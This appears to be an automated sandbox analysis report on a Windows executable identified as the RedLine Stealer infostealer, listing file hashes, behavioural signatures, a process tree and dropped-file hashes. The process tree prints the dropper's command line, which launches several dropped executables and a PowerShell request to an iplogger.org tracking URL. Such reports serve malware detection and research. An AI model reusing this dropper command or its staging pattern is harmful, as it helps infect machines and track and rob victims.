Analysis
-
max time kernel
151s -
max time network
155s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
21-03-2021 10:45
Static task
static1
Behavioral task
behavioral1
Sample
f5366963764901262499c8021333f986.exe
Resource
win7v20201028
Behavioral task
behavioral2
Sample
f5366963764901262499c8021333f986.exe
Resource
win10v20201028
General
-
Target
f5366963764901262499c8021333f986.exe
-
Size
1.1MB
-
MD5
f5366963764901262499c8021333f986
-
SHA1
e57b794220e7a6184614ccd4a6ddcf99de7e0717
-
SHA256
38920e6f3a9c5908e9360388f0aa1f65b8e3df46849d758db7e1cdbf84727e3f
-
SHA512
84cde9fd4846e839fee7171546c76253c321af4bc619e2b0b4830077b9d966251e36217f60c6da6c31258770fbf71284a1896a7bc5b388c609ebf18be9c048d6
Malware Config
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 3 IoCs
Processes:
resource yara_rule behavioral1/memory/1584-69-0x0000000000400000-0x0000000000428000-memory.dmp family_redline behavioral1/memory/1584-70-0x0000000000421DFE-mapping.dmp family_redline behavioral1/memory/1584-73-0x0000000000400000-0x0000000000428000-memory.dmp family_redline -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 7 1604 powershell.exe 9 1604 powershell.exe -
Executes dropped EXE 5 IoCs
Processes:
hello_C# (2).exehello_C#.exejayson.exeriv.exejayson.exepid process 1144 hello_C# (2).exe 1752 hello_C#.exe 1720 jayson.exe 1472 riv.exe 1584 jayson.exe -
Loads dropped DLL 7 IoCs
Processes:
f5366963764901262499c8021333f986.execmd.exejayson.exepid process 1096 f5366963764901262499c8021333f986.exe 1928 cmd.exe 1928 cmd.exe 1928 cmd.exe 1928 cmd.exe 1928 cmd.exe 1720 jayson.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Suspicious use of SetThreadContext 1 IoCs
Processes:
jayson.exedescription pid process target process PID 1720 set thread context of 1584 1720 jayson.exe jayson.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 1604 powershell.exe 1604 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exejayson.exedescription pid process Token: SeDebugPrivilege 1604 powershell.exe Token: SeDebugPrivilege 1584 jayson.exe -
Suspicious use of WriteProcessMemory 33 IoCs
Processes:
f5366963764901262499c8021333f986.execmd.exejayson.exedescription pid process target process PID 1096 wrote to memory of 1928 1096 f5366963764901262499c8021333f986.exe cmd.exe PID 1096 wrote to memory of 1928 1096 f5366963764901262499c8021333f986.exe cmd.exe PID 1096 wrote to memory of 1928 1096 f5366963764901262499c8021333f986.exe cmd.exe PID 1096 wrote to memory of 1928 1096 f5366963764901262499c8021333f986.exe cmd.exe PID 1928 wrote to memory of 1144 1928 cmd.exe hello_C# (2).exe PID 1928 wrote to memory of 1144 1928 cmd.exe hello_C# (2).exe PID 1928 wrote to memory of 1144 1928 cmd.exe hello_C# (2).exe PID 1928 wrote to memory of 1144 1928 cmd.exe hello_C# (2).exe PID 1928 wrote to memory of 1752 1928 cmd.exe hello_C#.exe PID 1928 wrote to memory of 1752 1928 cmd.exe hello_C#.exe PID 1928 wrote to memory of 1752 1928 cmd.exe hello_C#.exe PID 1928 wrote to memory of 1752 1928 cmd.exe hello_C#.exe PID 1928 wrote to memory of 1720 1928 cmd.exe jayson.exe PID 1928 wrote to memory of 1720 1928 cmd.exe jayson.exe PID 1928 wrote to memory of 1720 1928 cmd.exe jayson.exe PID 1928 wrote to memory of 1720 1928 cmd.exe jayson.exe PID 1928 wrote to memory of 1472 1928 cmd.exe riv.exe PID 1928 wrote to memory of 1472 1928 cmd.exe riv.exe PID 1928 wrote to memory of 1472 1928 cmd.exe riv.exe PID 1928 wrote to memory of 1472 1928 cmd.exe riv.exe PID 1928 wrote to memory of 1604 1928 cmd.exe powershell.exe PID 1928 wrote to memory of 1604 1928 cmd.exe powershell.exe PID 1928 wrote to memory of 1604 1928 cmd.exe powershell.exe PID 1928 wrote to memory of 1604 1928 cmd.exe powershell.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe PID 1720 wrote to memory of 1584 1720 jayson.exe jayson.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\f5366963764901262499c8021333f986.exe"C:\Users\Admin\AppData\Local\Temp\f5366963764901262499c8021333f986.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c start "" "hello_C# (2).exe" & start "" "hello_C#.exe" & start "" "jayson.exe" & start "" "riv.exe" & powershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Local\Temp\hello_C# (2).exe"hello_C# (2).exe"3⤵
- Executes dropped EXE
PID:1144 -
C:\Users\Admin\AppData\Local\Temp\hello_C#.exe"hello_C#.exe"3⤵
- Executes dropped EXE
PID:1752 -
C:\Users\Admin\AppData\Local\Temp\jayson.exe"jayson.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1720 -
C:\Users\Admin\AppData\Local\Temp\jayson.exe"{path}"4⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1584 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri https://iplogger.org/1iRpu7"3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1604 -
C:\Users\Admin\AppData\Local\Temp\riv.exe"riv.exe"3⤵
- Executes dropped EXE
PID:1472
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
d6b9f530e7e8ddebea8069a0d94ad38e
SHA128b7ada0d7cbfaccc5cf66d2d22e08e9132b3c67
SHA2563e788314ac14e4f4040460e5140dab61e2cf8968cf36e458ee875ec382787904
SHA5122f80e079aeaec7ed92c0bf8216ce0c362bc63f104090185ebdd140c13b5d97fd57c84c3ce71700b18ca651c0c075a5567f84847a1389fbc32a199eb050468815
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
68f70e9545a6dbeecd3e2eba38c197ca
SHA15d0fdc7452e3af1c4d7b145256888687e5fd2a72
SHA256a530aa8c670be7b56608fc342b9f98734d3c038d7dae02108d8073fe7cb85804
SHA51299f9d31a72e1ba86fbe1d04020f95d8b83cf0edf2969051d327bb1144dc88eeb12b8afbe22ce050d39c45fa8b4dd4697c5962e45a6d7dda00468f2146aef4bc9
-
MD5
293165db1e46070410b4209519e67494
SHA1777b96a4f74b6c34d43a4e7c7e656757d1c97f01
SHA25649b7477db8dd22f8cf2d41ee2d79ce57797f02e8c7b9e799951a6c710384349a
SHA51297012139f2da5868fe8731c0b0bcb3cfda29ed10c2e6e2336b504480c9cd9fb8f4728cca23f1e0bd577d75daa542e59f94d1d341f4e8aaeebc7134bf61288c19
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338
-
MD5
bd96d90751fd507c3af0edbe0d596ec4
SHA1eed0bb7626d328190c7de701c0071f9c4ad048ef
SHA256f34caf8fccb7eddad3f4cde91939d6d87644b5703f67ea0546f3cf0f6c1171db
SHA5125948bed6635306588b1c2f954bfe62657b3929e8f7f23ce6a1f3db494d657518399e9b1812ba0daa78f07cf5205d85ae765049961723886604765461b7b68338